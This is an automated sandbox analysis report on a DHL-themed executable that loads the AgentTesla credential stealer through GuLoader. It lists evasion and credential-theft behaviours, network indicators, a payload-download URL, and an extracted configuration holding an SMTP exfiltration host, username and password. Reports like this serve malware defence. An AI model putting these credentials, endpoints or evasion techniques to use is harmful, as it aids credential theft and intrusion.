Play interactive tour

Edit tour

Analysis Report Original Shipment Document.exe

Overview

General Information

Sample Name:	Original Shipment Document.exe
Analysis ID:	320278
MD5:	857d9deaf0fad01a7ec5dd82834d43be
SHA1:	82bf78bc3a8e29a5522c675b4d31e31283e5fd80
SHA256:	db40431cb3b2ca4524e58a97e2bdb1853a8adf866a2b2f43ea05a2b65b34ae72
Tags:	DHLexe
Most interesting Screenshot:

Detection

AgentTesla GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected Agent Tesla Trojan

Yara detected AgentTesla

Yara detected GuLoader

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Contains functionality to detect sleep reduction / modifications

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Machine Learning detection for sample

Maps a DLL or memory area into another process

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Yara detected VB6 Downloader Generic

AV process strings found (often used to terminate AV products)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Credential Stealer

Yara signature match

Classification

Startup

System is w10x64

Original Shipment Document.exe (PID: 4072 cmdline: 'C:\Users\user\Desktop\Original Shipment Document.exe' MD5: 857D9DEAF0FAD01A7EC5DD82834D43BE)

Original Shipment Document.exe (PID: 5852 cmdline: 'C:\Users\user\Desktop\Original Shipment Document.exe' MD5: 857D9DEAF0FAD01A7EC5DD82834D43BE)

Original Shipment Document.exe (PID: 5240 cmdline: 'C:\Users\user\Desktop\Original Shipment Document.exe' MD5: 857D9DEAF0FAD01A7EC5DD82834D43BE)

Original Shipment Document.exe (PID: 1848 cmdline: 'C:\Users\user\Desktop\Original Shipment Document.exe' MD5: 857D9DEAF0FAD01A7EC5DD82834D43BE)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": " rGcp4B", "URL: ": "", "To: ": "finance@enmark.com.my", "ByHost: ": "mail.enmark.com.my:587", "Password: ": " U4Q6qXPgmf", "From: ": "finance@enmark.com.my"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.500431770.0000000000AE2000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000C.00000002.499678365.0000000000459000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.499467401.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.332714204.000000001F732000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected Agent Tesla Trojan	Joe Security
0000000C.00000002.504397357.0000000002CFA000.00000004.00000001.sdmp	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x210:$a: type={ 0x29c:$a: type={ 0x21a:$b: hwid={ 0x2a6:$b: hwid={ 0x224:$c: time={ 0x2b0:$c: time={ 0x22e:$d: pcname={ 0x2ba:$d: pcname={ 0x23a:$e: logdata={ 0x2c6:$e: logdata={ 0x247:$f: screen={ 0x2d3:$f: screen={ 0x253:$g: ipadd={ 0x2df:$g: ipadd={ 0x25e:$h: webcam_link={ 0x2ea:$h: webcam_link={ 0x26f:$i: screen_link={ 0x2fb:$i: screen_link={ 0x280:$k: [passwords] 0x30c:$k: [passwords]
0000000C.00000002.500366577.0000000000A90000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
0000000C.00000002.500615250.0000000002312000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.332753801.000000001F789000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Original Shipment Document.exe PID: 5852	JoeSecurity_VB6DownloaderGeneric	Yara detected VB6 Downloader Generic	Joe Security
Process Memory Space: Original Shipment Document.exe PID: 5852	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Process Memory Space: Original Shipment Document.exe PID: 1848	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected Agent Tesla Trojan	Joe Security
Process Memory Space: Original Shipment Document.exe PID: 1848	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Original Shipment Document.exe PID: 1848	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Original Shipment Document.exe PID: 1848	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x1d7cda:$a: type={ 0x1d7d74:$a: type={ 0x1d7e01:$a: type={ 0x1d7e8d:$a: type={ 0x1d82fb:$a: type={ 0x1d7ce4:$b: hwid={ 0x1d7d7e:$b: hwid={ 0x1d7e0b:$b: hwid={ 0x1d7e97:$b: hwid={ 0x1d8305:$b: hwid={ 0x1d7cee:$c: time={ 0x1d7d88:$c: time={ 0x1d7e15:$c: time={ 0x1d7ea1:$c: time={ 0x1d830f:$c: time={ 0x1d7cf8:$d: pcname={ 0x1d7d92:$d: pcname={ 0x1d7e1f:$d: pcname={ 0x1d7eab:$d: pcname={ 0x1d8319:$d: pcname={ 0x1d7d04:$e: logdata={
Process Memory Space: Original Shipment Document.exe PID: 5240	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Original Shipment Document.exe PID: 5240	JoeSecurity_GuLoader	Yara detected GuLoader	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
12.2.Original Shipment Document.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.Original Shipment Document.exe.a90000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.Original Shipment Document.exe.2310000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.Original Shipment Document.exe.a90000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.Original Shipment Document.exe.1f730000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
12.2.Original Shipment Document.exe.ae0000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: Original Shipment Document.exe.1848.12.memstr	Malware Configuration Extractor: Agenttesla {"Username: ": " rGcp4B", "URL: ": "", "To: ": "finance@enmark.com.my", "ByHost: ": "mail.enmark.com.my:587", "Password: ": " U4Q6qXPgmf", "From: ": "finance@enmark.com.my"}
Source: Original Shipment Document.exe.1848.12.memstr	Malware Configuration Extractor: Agenttesla {"Username: ": " rGcp4B", "URL: ": "", "To: ": "finance@enmark.com.my", "ByHost: ": "mail.enmark.com.my:587", "Password: ": " U4Q6qXPgmf", "From: ": "finance@enmark.com.my"}

Multi AV Scanner detection for submitted file

Show sources

Source: Original Shipment Document.exe	Virustotal: Detection: 31%			Perma Link
Source: Original Shipment Document.exe	Virustotal: Detection: 31%			Perma Link

Machine Learning detection for sample

Show sources

Source: Original Shipment Document.exe	Joe Sandbox ML: detected
Source: Original Shipment Document.exe	Joe Sandbox ML: detected

Source: 4.2.Original Shipment Document.exe.1f730000.4.unpack	Avira: Label: TR/Spy.Agent.lkofd
Source: 12.2.Original Shipment Document.exe.2310000.3.unpack	Avira: Label: TR/Spy.Agent.lkofd
Source: 12.2.Original Shipment Document.exe.ae0000.2.unpack	Avira: Label: TR/Spy.Agent.lkofd
Source: 12.2.Original Shipment Document.exe.400000.0.unpack	Avira: Label: TR/Spy.Agent.lkofd
Source: 4.2.Original Shipment Document.exe.1f730000.4.unpack	Avira: Label: TR/Spy.Agent.lkofd
Source: 12.2.Original Shipment Document.exe.2310000.3.unpack	Avira: Label: TR/Spy.Agent.lkofd
Source: 12.2.Original Shipment Document.exe.ae0000.2.unpack	Avira: Label: TR/Spy.Agent.lkofd
Source: 12.2.Original Shipment Document.exe.400000.0.unpack	Avira: Label: TR/Spy.Agent.lkofd

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00408938 FindFirstFileA,GetLastError,	0_2_00408938
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405AC0
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00408938 FindFirstFileA,GetLastError,	0_2_00408938
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,	0_2_00405AC0

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov ecx, dword ptr [edi+00000808h]	1_2_02340BC1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov edi, dword ptr [ebp+20h]	1_2_023408EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov ecx, dword ptr [edi+00000808h]	1_2_023408EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov ecx, dword ptr [edi+00000808h]	1_2_02340BC1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov edi, dword ptr [ebp+20h]	1_2_023408EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov ecx, dword ptr [edi+00000808h]	1_2_023408EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov ecx, dword ptr [edi+00000808h]	4_2_00560BC1
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov edi, dword ptr [ebp+20h]	4_2_005608EF
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 4x nop then mov ecx, dword ptr [edi+00000808h]	4_2_005608EF

Networking:

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: checkip.amazonaws.com
Source: unknown	DNS query: name: checkip.amazonaws.com
Source: unknown	DNS query: name: checkip.amazonaws.com
Source: unknown	DNS query: name: checkip.amazonaws.com

Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 110.4.45.145:587
Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 110.4.45.145:587

Source: Joe Sandbox View	IP Address: 216.58.215.225 216.58.215.225
Source: Joe Sandbox View	IP Address: 216.58.215.225 216.58.215.225
Source: Joe Sandbox View	IP Address: 216.58.215.225 216.58.215.225
Source: Joe Sandbox View	IP Address: 216.58.215.225 216.58.215.225
Source: Joe Sandbox View	IP Address: 110.4.45.145 110.4.45.145

Source: Joe Sandbox View	ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
Source: Joe Sandbox View	ASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY

Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 110.4.45.145:587
Source: global traffic	TCP traffic: 192.168.2.5:49736 -> 110.4.45.145:587

Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_023AA186 recv,		12_2_023AA186
Source: C:\Users\user\Desktop\Original Shipment Document.exe	Code function: 12_2_023AA186 recv,		12_2_023AA186

Source: unknown	DNS traffic detected: queries for: doc-0c-3k-docs.googleusercontent.com
Source: unknown	DNS traffic detected: queries for: doc-0c-3k-docs.googleusercontent.com

Source: Original Shipment Document.exe, 0000000C.00000002.504812359.0000000002F24000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.amazonaws.com
Source: Original Shipment Document.exe, 0000000C.00000002.504800382.0000000002F1A000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.amazonaws.com/
Source: Original Shipment Document.exe, 0000000C.00000002.504812359.0000000002F24000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.amazonaws.comx&
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Original Shipment Document.exe, 0000000C.00000002.505756785.0000000005EF0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, Original Shipment Document.exe, 0000000C.00000002.504792985.0000000002F15000.00000004.00000001.sdmp, Original Shipment Document.exe, 0000000C.00000002.504781050.0000000002EFE000.00000004.00000001.sdmp	String found in binary or memory: http://pC7mVPB6Y4Irl4x.org
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://pC7mVPB6Y4Irl4x.orgh_G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpP3G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/H
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/H
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, Original Shipment Document.exe, 0000000C.00000002.499958957.0000000000574000.00000004.00000020.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phpH
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1P3G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1P3G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpH
Source: Original Shipment Document.exe, 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1H5J20cDnop7M6bMvKPeXGm49G-GMKovF
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srf
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srfH
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeH
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/H
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/thank-you.htmlH
Source: Original Shipment Document.exe, 0000000C.00000002.504812359.0000000002F24000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.amazonaws.com
Source: Original Shipment Document.exe, 0000000C.00000002.504800382.0000000002F1A000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.amazonaws.com/
Source: Original Shipment Document.exe, 0000000C.00000002.504812359.0000000002F24000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.amazonaws.comx&
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Original Shipment Document.exe, 0000000C.00000002.505756785.0000000005EF0000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, Original Shipment Document.exe, 0000000C.00000002.504792985.0000000002F15000.00000004.00000001.sdmp, Original Shipment Document.exe, 0000000C.00000002.504781050.0000000002EFE000.00000004.00000001.sdmp	String found in binary or memory: http://pC7mVPB6Y4Irl4x.org
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://pC7mVPB6Y4Irl4x.orgh_G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpP3G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/H
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-ch/H
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp, Original Shipment Document.exe, 0000000C.00000002.499958957.0000000000574000.00000004.00000020.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.phpH
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1P3G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1P3G
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpH
Source: Original Shipment Document.exe, 00000004.00000002.327982793.0000000000560000.00000040.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1H5J20cDnop7M6bMvKPeXGm49G-GMKovF
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srf
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/login.srfH
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorizeH
Source: Original Shipment Document.exe, 0000000C.00000002.500024504.00000000005B3000.00000004.00000020.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: Original Shipment Document.exe, 0000000C.00000002.504488463.0000000002D56000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/chrome/
